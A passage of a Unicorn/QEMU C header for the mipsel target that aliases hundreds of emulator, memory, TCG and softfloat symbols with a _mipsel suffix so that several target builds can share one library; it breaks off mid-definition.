#define have_vsx have_vsx_mipsel #define flush_icache_range flush_icache_range_mipsel #define s390_facilities s390_facilities_mipsel #define tcg_dump_op tcg_dump_op_mipsel #define tcg_dump_ops tcg_dump_ops_mipsel #define tcg_gen_and_i64 tcg_gen_and_i64_mipsel #define tcg_gen_discard_i64 tcg_gen_discard_i64_mipsel #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_mipsel #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_mipsel #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_mipsel #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_mipsel #define tcg_gen_ld8s_i64 
tcg_gen_ld8s_i64_mipsel #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_mipsel #define tcg_gen_ld_i64 tcg_gen_ld_i64_mipsel #define tcg_gen_mov_i64 tcg_gen_mov_i64_mipsel #define tcg_gen_movi_i64 tcg_gen_movi_i64_mipsel #define tcg_gen_mul_i64 tcg_gen_mul_i64_mipsel #define tcg_gen_or_i64 tcg_gen_or_i64_mipsel #define tcg_gen_sar_i64 tcg_gen_sar_i64_mipsel #define tcg_gen_shl_i64 tcg_gen_shl_i64_mipsel #define tcg_gen_shr_i64 tcg_gen_shr_i64_mipsel #define tcg_gen_st_i64 tcg_gen_st_i64_mipsel #define tcg_gen_xor_i64 tcg_gen_xor_i64_mipsel #define cpu_icount_to_ns cpu_icount_to_ns_mipsel #define cpu_is_stopped cpu_is_stopped_mipsel #define cpu_get_ticks cpu_get_ticks_mipsel #define cpu_get_clock cpu_get_clock_mipsel #define cpu_resume cpu_resume_mipsel #define qemu_init_vcpu qemu_init_vcpu_mipsel #define cpu_stop_current cpu_stop_current_mipsel #define resume_all_vcpus resume_all_vcpus_mipsel #define vm_start vm_start_mipsel #define address_space_dispatch_compact address_space_dispatch_compact_mipsel #define flatview_translate flatview_translate_mipsel #define address_space_translate_for_iotlb address_space_translate_for_iotlb_mipsel #define qemu_get_cpu qemu_get_cpu_mipsel #define cpu_address_space_init cpu_address_space_init_mipsel #define cpu_get_address_space cpu_get_address_space_mipsel #define cpu_exec_unrealizefn cpu_exec_unrealizefn_mipsel #define cpu_exec_initfn cpu_exec_initfn_mipsel #define cpu_exec_realizefn cpu_exec_realizefn_mipsel #define tb_invalidate_phys_addr tb_invalidate_phys_addr_mipsel #define cpu_watchpoint_insert cpu_watchpoint_insert_mipsel #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mipsel #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mipsel #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mipsel #define cpu_breakpoint_insert cpu_breakpoint_insert_mipsel #define cpu_breakpoint_remove cpu_breakpoint_remove_mipsel #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mipsel #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mipsel #define cpu_abort cpu_abort_mipsel #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_mipsel #define memory_region_section_get_iotlb memory_region_section_get_iotlb_mipsel #define flatview_add_to_dispatch flatview_add_to_dispatch_mipsel #define qemu_ram_get_host_addr qemu_ram_get_host_addr_mipsel #define qemu_ram_get_offset qemu_ram_get_offset_mipsel #define qemu_ram_get_used_length qemu_ram_get_used_length_mipsel #define qemu_ram_is_shared qemu_ram_is_shared_mipsel #define qemu_ram_pagesize qemu_ram_pagesize_mipsel #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mipsel #define qemu_ram_alloc qemu_ram_alloc_mipsel #define qemu_ram_free qemu_ram_free_mipsel #define qemu_map_ram_ptr qemu_map_ram_ptr_mipsel #define qemu_ram_block_host_offset qemu_ram_block_host_offset_mipsel #define qemu_ram_block_from_host qemu_ram_block_from_host_mipsel #define qemu_ram_addr_from_host qemu_ram_addr_from_host_mipsel #define cpu_check_watchpoint cpu_check_watchpoint_mipsel #define iotlb_to_section iotlb_to_section_mipsel #define address_space_dispatch_new address_space_dispatch_new_mipsel #define address_space_dispatch_free address_space_dispatch_free_mipsel #define flatview_read_continue flatview_read_continue_mipsel #define address_space_read_full address_space_read_full_mipsel #define address_space_write address_space_write_mipsel #define address_space_rw address_space_rw_mipsel #define cpu_physical_memory_rw cpu_physical_memory_rw_mipsel 
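/*
 * Each alias in this header follows the same pattern:
 *     #define <qemu_symbol> <qemu_symbol>_mipsel
 * After preprocessing, a reference such as reg_read() in this target's
 * objects resolves to reg_read_mipsel(), so several per-target builds of
 * the same QEMU code can be linked into one Unicorn library without
 * duplicate-symbol clashes.
 */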
#define address_space_write_rom address_space_write_rom_mipsel #define cpu_flush_icache_range cpu_flush_icache_range_mipsel #define cpu_exec_init_all cpu_exec_init_all_mipsel #define address_space_access_valid address_space_access_valid_mipsel #define address_space_map address_space_map_mipsel #define address_space_unmap address_space_unmap_mipsel #define cpu_physical_memory_map cpu_physical_memory_map_mipsel #define cpu_physical_memory_unmap cpu_physical_memory_unmap_mipsel #define cpu_memory_rw_debug cpu_memory_rw_debug_mipsel #define qemu_target_page_size qemu_target_page_size_mipsel #define qemu_target_page_bits qemu_target_page_bits_mipsel #define qemu_target_page_bits_min qemu_target_page_bits_min_mipsel #define target_words_bigendian target_words_bigendian_mipsel #define cpu_physical_memory_is_io cpu_physical_memory_is_io_mipsel #define ram_block_discard_range ram_block_discard_range_mipsel #define ramblock_is_pmem ramblock_is_pmem_mipsel #define page_size_init page_size_init_mipsel #define set_preferred_target_page_bits set_preferred_target_page_bits_mipsel #define finalize_target_page_bits finalize_target_page_bits_mipsel #define cpu_outb cpu_outb_mipsel #define cpu_outw cpu_outw_mipsel #define cpu_outl cpu_outl_mipsel #define cpu_inb cpu_inb_mipsel #define cpu_inw cpu_inw_mipsel #define cpu_inl cpu_inl_mipsel #define memory_map memory_map_mipsel #define memory_map_io memory_map_io_mipsel #define memory_map_ptr memory_map_ptr_mipsel #define memory_cow memory_cow_mipsel #define memory_unmap memory_unmap_mipsel #define memory_moveout memory_moveout_mipsel #define memory_movein memory_movein_mipsel #define memory_free memory_free_mipsel #define flatview_unref flatview_unref_mipsel #define address_space_get_flatview address_space_get_flatview_mipsel #define memory_region_transaction_begin memory_region_transaction_begin_mipsel #define memory_region_transaction_commit memory_region_transaction_commit_mipsel #define memory_region_init memory_region_init_mipsel #define memory_region_access_valid memory_region_access_valid_mipsel #define memory_region_dispatch_read memory_region_dispatch_read_mipsel #define memory_region_dispatch_write memory_region_dispatch_write_mipsel #define memory_region_init_io memory_region_init_io_mipsel #define memory_region_init_ram_ptr memory_region_init_ram_ptr_mipsel #define memory_region_size memory_region_size_mipsel #define memory_region_set_readonly memory_region_set_readonly_mipsel #define memory_region_get_ram_ptr memory_region_get_ram_ptr_mipsel #define memory_region_from_host memory_region_from_host_mipsel #define memory_region_get_ram_addr memory_region_get_ram_addr_mipsel #define memory_region_add_subregion memory_region_add_subregion_mipsel #define memory_region_del_subregion memory_region_del_subregion_mipsel #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mipsel #define memory_region_find memory_region_find_mipsel #define memory_region_filter_subregions memory_region_filter_subregions_mipsel #define memory_listener_register memory_listener_register_mipsel #define memory_listener_unregister memory_listener_unregister_mipsel #define address_space_remove_listeners address_space_remove_listeners_mipsel #define address_space_init address_space_init_mipsel #define address_space_destroy address_space_destroy_mipsel #define memory_region_init_ram memory_region_init_ram_mipsel #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mipsel #define find_memory_mapping find_memory_mapping_mipsel 
#define exec_inline_op exec_inline_op_mipsel #define floatx80_default_nan floatx80_default_nan_mipsel #define float_raise float_raise_mipsel #define float16_is_quiet_nan float16_is_quiet_nan_mipsel #define float16_is_signaling_nan float16_is_signaling_nan_mipsel #define float32_is_quiet_nan float32_is_quiet_nan_mipsel #define float32_is_signaling_nan float32_is_signaling_nan_mipsel #define float64_is_quiet_nan float64_is_quiet_nan_mipsel #define float64_is_signaling_nan float64_is_signaling_nan_mipsel #define floatx80_is_quiet_nan floatx80_is_quiet_nan_mipsel #define floatx80_is_signaling_nan floatx80_is_signaling_nan_mipsel #define floatx80_silence_nan floatx80_silence_nan_mipsel #define propagateFloatx80NaN propagateFloatx80NaN_mipsel #define float128_is_quiet_nan float128_is_quiet_nan_mipsel #define float128_is_signaling_nan float128_is_signaling_nan_mipsel #define float128_silence_nan float128_silence_nan_mipsel #define float16_add float16_add_mipsel #define float16_sub float16_sub_mipsel #define float32_add float32_add_mipsel #define float32_sub float32_sub_mipsel #define float64_add float64_add_mipsel #define float64_sub float64_sub_mipsel #define float16_mul float16_mul_mipsel #define float32_mul float32_mul_mipsel #define float64_mul float64_mul_mipsel #define float16_muladd float16_muladd_mipsel #define float32_muladd float32_muladd_mipsel #define float64_muladd float64_muladd_mipsel #define float16_div float16_div_mipsel #define float32_div float32_div_mipsel #define float64_div float64_div_mipsel #define float16_to_float32 float16_to_float32_mipsel #define float16_to_float64 float16_to_float64_mipsel #define float32_to_float16 float32_to_float16_mipsel #define float32_to_float64 float32_to_float64_mipsel #define float64_to_float16 float64_to_float16_mipsel #define float64_to_float32 float64_to_float32_mipsel #define float16_round_to_int float16_round_to_int_mipsel #define float32_round_to_int float32_round_to_int_mipsel #define float64_round_to_int float64_round_to_int_mipsel #define float16_to_int16_scalbn float16_to_int16_scalbn_mipsel #define float16_to_int32_scalbn float16_to_int32_scalbn_mipsel #define float16_to_int64_scalbn float16_to_int64_scalbn_mipsel #define float32_to_int16_scalbn float32_to_int16_scalbn_mipsel #define float32_to_int32_scalbn float32_to_int32_scalbn_mipsel #define float32_to_int64_scalbn float32_to_int64_scalbn_mipsel #define float64_to_int16_scalbn float64_to_int16_scalbn_mipsel #define float64_to_int32_scalbn float64_to_int32_scalbn_mipsel #define float64_to_int64_scalbn float64_to_int64_scalbn_mipsel #define float16_to_int16 float16_to_int16_mipsel #define float16_to_int32 float16_to_int32_mipsel #define float16_to_int64 float16_to_int64_mipsel #define float32_to_int16 float32_to_int16_mipsel #define float32_to_int32 float32_to_int32_mipsel #define float32_to_int64 float32_to_int64_mipsel #define float64_to_int16 float64_to_int16_mipsel #define float64_to_int32 float64_to_int32_mipsel #define float64_to_int64 float64_to_int64_mipsel #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_mipsel #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_mipsel #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_mipsel #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mipsel #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mipsel #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mipsel #define float64_to_int16_round_to_zero 
float64_to_int16_round_to_zero_mipsel #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mipsel #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mipsel #define float16_to_uint16_scalbn float16_to_uint16_scalbn_mipsel #define float16_to_uint32_scalbn float16_to_uint32_scalbn_mipsel #define float16_to_uint64_scalbn float16_to_uint64_scalbn_mipsel #define float32_to_uint16_scalbn float32_to_uint16_scalbn_mipsel #define float32_to_uint32_scalbn float32_to_uint32_scalbn_mipsel #define float32_to_uint64_scalbn float32_to_uint64_scalbn_mipsel #define float64_to_uint16_scalbn float64_to_uint16_scalbn_mipsel #define float64_to_uint32_scalbn float64_to_uint32_scalbn_mipsel #define float64_to_uint64_scalbn float64_to_uint64_scalbn_mipsel #define float16_to_uint16 float16_to_uint16_mipsel #define float16_to_uint32 float16_to_uint32_mipsel #define float16_to_uint64 float16_to_uint64_mipsel #define float32_to_uint16 float32_to_uint16_mipsel #define float32_to_uint32 float32_to_uint32_mipsel #define float32_to_uint64 float32_to_uint64_mipsel #define float64_to_uint16 float64_to_uint16_mipsel #define float64_to_uint32 float64_to_uint32_mipsel #define float64_to_uint64 float64_to_uint64_mipsel #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_mipsel #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_mipsel #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_mipsel #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mipsel #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mipsel #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mipsel #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mipsel #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mipsel #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mipsel #define int64_to_float16_scalbn int64_to_float16_scalbn_mipsel #define int32_to_float16_scalbn int32_to_float16_scalbn_mipsel #define int16_to_float16_scalbn int16_to_float16_scalbn_mipsel #define int64_to_float16 int64_to_float16_mipsel #define int32_to_float16 int32_to_float16_mipsel #define int16_to_float16 int16_to_float16_mipsel #define int64_to_float32_scalbn int64_to_float32_scalbn_mipsel #define int32_to_float32_scalbn int32_to_float32_scalbn_mipsel #define int16_to_float32_scalbn int16_to_float32_scalbn_mipsel #define int64_to_float32 int64_to_float32_mipsel #define int32_to_float32 int32_to_float32_mipsel #define int16_to_float32 int16_to_float32_mipsel #define int64_to_float64_scalbn int64_to_float64_scalbn_mipsel #define int32_to_float64_scalbn int32_to_float64_scalbn_mipsel #define int16_to_float64_scalbn int16_to_float64_scalbn_mipsel #define int64_to_float64 int64_to_float64_mipsel #define int32_to_float64 int32_to_float64_mipsel #define int16_to_float64 int16_to_float64_mipsel #define uint64_to_float16_scalbn uint64_to_float16_scalbn_mipsel #define uint32_to_float16_scalbn uint32_to_float16_scalbn_mipsel #define uint16_to_float16_scalbn uint16_to_float16_scalbn_mipsel #define uint64_to_float16 uint64_to_float16_mipsel #define uint32_to_float16 uint32_to_float16_mipsel #define uint16_to_float16 uint16_to_float16_mipsel #define uint64_to_float32_scalbn uint64_to_float32_scalbn_mipsel #define uint32_to_float32_scalbn uint32_to_float32_scalbn_mipsel #define uint16_to_float32_scalbn uint16_to_float32_scalbn_mipsel #define uint64_to_float32 uint64_to_float32_mipsel 
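/* The float16_/float32_/float64_/floatx80_/float128_ aliases cover QEMU's softfloat emulation library. */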
#define uint32_to_float32 uint32_to_float32_mipsel #define uint16_to_float32 uint16_to_float32_mipsel #define uint64_to_float64_scalbn uint64_to_float64_scalbn_mipsel #define uint32_to_float64_scalbn uint32_to_float64_scalbn_mipsel #define uint16_to_float64_scalbn uint16_to_float64_scalbn_mipsel #define uint64_to_float64 uint64_to_float64_mipsel #define uint32_to_float64 uint32_to_float64_mipsel #define uint16_to_float64 uint16_to_float64_mipsel #define float16_min float16_min_mipsel #define float16_minnum float16_minnum_mipsel #define float16_minnummag float16_minnummag_mipsel #define float16_max float16_max_mipsel #define float16_maxnum float16_maxnum_mipsel #define float16_maxnummag float16_maxnummag_mipsel #define float32_min float32_min_mipsel #define float32_minnum float32_minnum_mipsel #define float32_minnummag float32_minnummag_mipsel #define float32_max float32_max_mipsel #define float32_maxnum float32_maxnum_mipsel #define float32_maxnummag float32_maxnummag_mipsel #define float64_min float64_min_mipsel #define float64_minnum float64_minnum_mipsel #define float64_minnummag float64_minnummag_mipsel #define float64_max float64_max_mipsel #define float64_maxnum float64_maxnum_mipsel #define float64_maxnummag float64_maxnummag_mipsel #define float16_compare float16_compare_mipsel #define float16_compare_quiet float16_compare_quiet_mipsel #define float32_compare float32_compare_mipsel #define float32_compare_quiet float32_compare_quiet_mipsel #define float64_compare float64_compare_mipsel #define float64_compare_quiet float64_compare_quiet_mipsel #define float16_scalbn float16_scalbn_mipsel #define float32_scalbn float32_scalbn_mipsel #define float64_scalbn float64_scalbn_mipsel #define float16_sqrt float16_sqrt_mipsel #define float32_sqrt float32_sqrt_mipsel #define float64_sqrt float64_sqrt_mipsel #define float16_default_nan float16_default_nan_mipsel #define float32_default_nan float32_default_nan_mipsel #define float64_default_nan float64_default_nan_mipsel #define float128_default_nan float128_default_nan_mipsel #define float16_silence_nan float16_silence_nan_mipsel #define float32_silence_nan float32_silence_nan_mipsel #define float64_silence_nan float64_silence_nan_mipsel #define float16_squash_input_denormal float16_squash_input_denormal_mipsel #define float32_squash_input_denormal float32_squash_input_denormal_mipsel #define float64_squash_input_denormal float64_squash_input_denormal_mipsel #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mipsel #define roundAndPackFloatx80 roundAndPackFloatx80_mipsel #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mipsel #define int32_to_floatx80 int32_to_floatx80_mipsel #define int32_to_float128 int32_to_float128_mipsel #define int64_to_floatx80 int64_to_floatx80_mipsel #define int64_to_float128 int64_to_float128_mipsel #define uint64_to_float128 uint64_to_float128_mipsel #define float32_to_floatx80 float32_to_floatx80_mipsel #define float32_to_float128 float32_to_float128_mipsel #define float32_rem float32_rem_mipsel #define float32_exp2 float32_exp2_mipsel #define float32_log2 float32_log2_mipsel #define float32_eq float32_eq_mipsel #define float32_le float32_le_mipsel #define float32_lt float32_lt_mipsel #define float32_unordered float32_unordered_mipsel #define float32_eq_quiet float32_eq_quiet_mipsel #define float32_le_quiet float32_le_quiet_mipsel #define float32_lt_quiet float32_lt_quiet_mipsel #define float32_unordered_quiet float32_unordered_quiet_mipsel #define float64_to_floatx80 
float64_to_floatx80_mipsel #define float64_to_float128 float64_to_float128_mipsel #define float64_rem float64_rem_mipsel #define float64_log2 float64_log2_mipsel #define float64_eq float64_eq_mipsel #define float64_le float64_le_mipsel #define float64_lt float64_lt_mipsel #define float64_unordered float64_unordered_mipsel #define float64_eq_quiet float64_eq_quiet_mipsel #define float64_le_quiet float64_le_quiet_mipsel #define float64_lt_quiet float64_lt_quiet_mipsel #define float64_unordered_quiet float64_unordered_quiet_mipsel #define floatx80_to_int32 floatx80_to_int32_mipsel #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mipsel #define floatx80_to_int64 floatx80_to_int64_mipsel #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mipsel #define floatx80_to_float32 floatx80_to_float32_mipsel #define floatx80_to_float64 floatx80_to_float64_mipsel #define floatx80_to_float128 floatx80_to_float128_mipsel #define floatx80_round floatx80_round_mipsel #define floatx80_round_to_int floatx80_round_to_int_mipsel #define floatx80_add floatx80_add_mipsel #define floatx80_sub floatx80_sub_mipsel #define floatx80_mul floatx80_mul_mipsel #define floatx80_div floatx80_div_mipsel #define floatx80_rem floatx80_rem_mipsel #define floatx80_sqrt floatx80_sqrt_mipsel #define floatx80_eq floatx80_eq_mipsel #define floatx80_le floatx80_le_mipsel #define floatx80_lt floatx80_lt_mipsel #define floatx80_unordered floatx80_unordered_mipsel #define floatx80_eq_quiet floatx80_eq_quiet_mipsel #define floatx80_le_quiet floatx80_le_quiet_mipsel #define floatx80_lt_quiet floatx80_lt_quiet_mipsel #define floatx80_unordered_quiet floatx80_unordered_quiet_mipsel #define float128_to_int32 float128_to_int32_mipsel #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mipsel #define float128_to_int64 float128_to_int64_mipsel #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mipsel #define float128_to_uint64 float128_to_uint64_mipsel #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_mipsel #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_mipsel #define float128_to_uint32 float128_to_uint32_mipsel #define float128_to_float32 float128_to_float32_mipsel #define float128_to_float64 float128_to_float64_mipsel #define float128_to_floatx80 float128_to_floatx80_mipsel #define float128_round_to_int float128_round_to_int_mipsel #define float128_add float128_add_mipsel #define float128_sub float128_sub_mipsel #define float128_mul float128_mul_mipsel #define float128_div float128_div_mipsel #define float128_rem float128_rem_mipsel #define float128_sqrt float128_sqrt_mipsel #define float128_eq float128_eq_mipsel #define float128_le float128_le_mipsel #define float128_lt float128_lt_mipsel #define float128_unordered float128_unordered_mipsel #define float128_eq_quiet float128_eq_quiet_mipsel #define float128_le_quiet float128_le_quiet_mipsel #define float128_lt_quiet float128_lt_quiet_mipsel #define float128_unordered_quiet float128_unordered_quiet_mipsel #define floatx80_compare floatx80_compare_mipsel #define floatx80_compare_quiet floatx80_compare_quiet_mipsel #define float128_compare float128_compare_mipsel #define float128_compare_quiet float128_compare_quiet_mipsel #define floatx80_scalbn floatx80_scalbn_mipsel #define float128_scalbn float128_scalbn_mipsel #define softfloat_init softfloat_init_mipsel #define tcg_optimize tcg_optimize_mipsel #define gen_new_label gen_new_label_mipsel #define 
tcg_can_emit_vec_op tcg_can_emit_vec_op_mipsel #define tcg_expand_vec_op tcg_expand_vec_op_mipsel #define tcg_register_jit tcg_register_jit_mipsel #define tcg_tb_insert tcg_tb_insert_mipsel #define tcg_tb_remove tcg_tb_remove_mipsel #define tcg_tb_lookup tcg_tb_lookup_mipsel #define tcg_tb_foreach tcg_tb_foreach_mipsel #define tcg_nb_tbs tcg_nb_tbs_mipsel #define tcg_region_reset_all tcg_region_reset_all_mipsel #define tcg_region_init tcg_region_init_mipsel #define tcg_code_size tcg_code_size_mipsel #define tcg_code_capacity tcg_code_capacity_mipsel #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_mipsel #define tcg_malloc_internal tcg_malloc_internal_mipsel #define tcg_pool_reset tcg_pool_reset_mipsel #define tcg_context_init tcg_context_init_mipsel #define tcg_tb_alloc tcg_tb_alloc_mipsel #define tcg_prologue_init tcg_prologue_init_mipsel #define tcg_func_start tcg_func_start_mipsel #define tcg_set_frame tcg_set_frame_mipsel #define tcg_global_mem_new_internal tcg_global_mem_new_internal_mipsel #define tcg_temp_new_internal tcg_temp_new_internal_mipsel #define tcg_temp_new_vec tcg_temp_new_vec_mipsel #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_mipsel #define tcg_temp_free_internal tcg_temp_free_internal_mipsel #define tcg_const_i32 tcg_const_i32_mipsel #define tcg_const_i64 tcg_const_i64_mipsel #define tcg_const_local_i32 tcg_const_local_i32_mipsel #define tcg_const_local_i64 tcg_const_local_i64_mipsel #define tcg_op_supported tcg_op_supported_mipsel #define tcg_gen_callN tcg_gen_callN_mipsel #define tcg_op_remove tcg_op_remove_mipsel #define tcg_emit_op tcg_emit_op_mipsel #define tcg_op_insert_before tcg_op_insert_before_mipsel #define tcg_op_insert_after tcg_op_insert_after_mipsel #define tcg_cpu_exec_time tcg_cpu_exec_time_mipsel #define tcg_gen_code tcg_gen_code_mipsel #define tcg_gen_op1 tcg_gen_op1_mipsel #define tcg_gen_op2 tcg_gen_op2_mipsel #define tcg_gen_op3 tcg_gen_op3_mipsel #define tcg_gen_op4 tcg_gen_op4_mipsel #define tcg_gen_op5 tcg_gen_op5_mipsel #define tcg_gen_op6 tcg_gen_op6_mipsel #define tcg_gen_mb tcg_gen_mb_mipsel #define tcg_gen_addi_i32 tcg_gen_addi_i32_mipsel #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_mipsel #define tcg_gen_subi_i32 tcg_gen_subi_i32_mipsel #define tcg_gen_andi_i32 tcg_gen_andi_i32_mipsel #define tcg_gen_ori_i32 tcg_gen_ori_i32_mipsel #define tcg_gen_xori_i32 tcg_gen_xori_i32_mipsel #define tcg_gen_shli_i32 tcg_gen_shli_i32_mipsel #define tcg_gen_shri_i32 tcg_gen_shri_i32_mipsel #define tcg_gen_sari_i32 tcg_gen_sari_i32_mipsel #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mipsel #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mipsel #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mipsel #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_mipsel #define tcg_gen_muli_i32 tcg_gen_muli_i32_mipsel #define tcg_gen_div_i32 tcg_gen_div_i32_mipsel #define tcg_gen_rem_i32 tcg_gen_rem_i32_mipsel #define tcg_gen_divu_i32 tcg_gen_divu_i32_mipsel #define tcg_gen_remu_i32 tcg_gen_remu_i32_mipsel #define tcg_gen_andc_i32 tcg_gen_andc_i32_mipsel #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_mipsel #define tcg_gen_nand_i32 tcg_gen_nand_i32_mipsel #define tcg_gen_nor_i32 tcg_gen_nor_i32_mipsel #define tcg_gen_orc_i32 tcg_gen_orc_i32_mipsel #define tcg_gen_clz_i32 tcg_gen_clz_i32_mipsel #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_mipsel #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_mipsel #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_mipsel #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_mipsel #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_mipsel #define 
tcg_gen_rotl_i32 tcg_gen_rotl_i32_mipsel #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mipsel #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mipsel #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mipsel #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mipsel #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_mipsel #define tcg_gen_extract_i32 tcg_gen_extract_i32_mipsel #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_mipsel #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_mipsel #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mipsel #define tcg_gen_add2_i32 tcg_gen_add2_i32_mipsel #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_mipsel #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mipsel #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mipsel #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_mipsel #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mipsel #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mipsel #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mipsel #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mipsel #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mipsel #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mipsel #define tcg_gen_smin_i32 tcg_gen_smin_i32_mipsel #define tcg_gen_umin_i32 tcg_gen_umin_i32_mipsel #define tcg_gen_smax_i32 tcg_gen_smax_i32_mipsel #define tcg_gen_umax_i32 tcg_gen_umax_i32_mipsel #define tcg_gen_abs_i32 tcg_gen_abs_i32_mipsel #define tcg_gen_addi_i64 tcg_gen_addi_i64_mipsel #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_mipsel #define tcg_gen_subi_i64 tcg_gen_subi_i64_mipsel #define tcg_gen_andi_i64 tcg_gen_andi_i64_mipsel #define tcg_gen_ori_i64 tcg_gen_ori_i64_mipsel #define tcg_gen_xori_i64 tcg_gen_xori_i64_mipsel #define tcg_gen_shli_i64 tcg_gen_shli_i64_mipsel #define tcg_gen_shri_i64 tcg_gen_shri_i64_mipsel #define tcg_gen_sari_i64 tcg_gen_sari_i64_mipsel #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mipsel #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_mipsel #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_mipsel #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_mipsel #define tcg_gen_muli_i64 tcg_gen_muli_i64_mipsel #define tcg_gen_div_i64 tcg_gen_div_i64_mipsel #define tcg_gen_rem_i64 tcg_gen_rem_i64_mipsel #define tcg_gen_divu_i64 tcg_gen_divu_i64_mipsel #define tcg_gen_remu_i64 tcg_gen_remu_i64_mipsel #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_mipsel #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_mipsel #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mipsel #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_mipsel #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_mipsel #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mipsel #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_mipsel #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_mipsel #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_mipsel #define tcg_gen_not_i64 tcg_gen_not_i64_mipsel #define tcg_gen_andc_i64 tcg_gen_andc_i64_mipsel #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_mipsel #define tcg_gen_nand_i64 tcg_gen_nand_i64_mipsel #define tcg_gen_nor_i64 tcg_gen_nor_i64_mipsel #define tcg_gen_orc_i64 tcg_gen_orc_i64_mipsel #define tcg_gen_clz_i64 tcg_gen_clz_i64_mipsel #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_mipsel #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_mipsel #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_mipsel #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_mipsel #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_mipsel #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_mipsel #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_mipsel #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_mipsel #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_mipsel #define tcg_gen_deposit_i64 
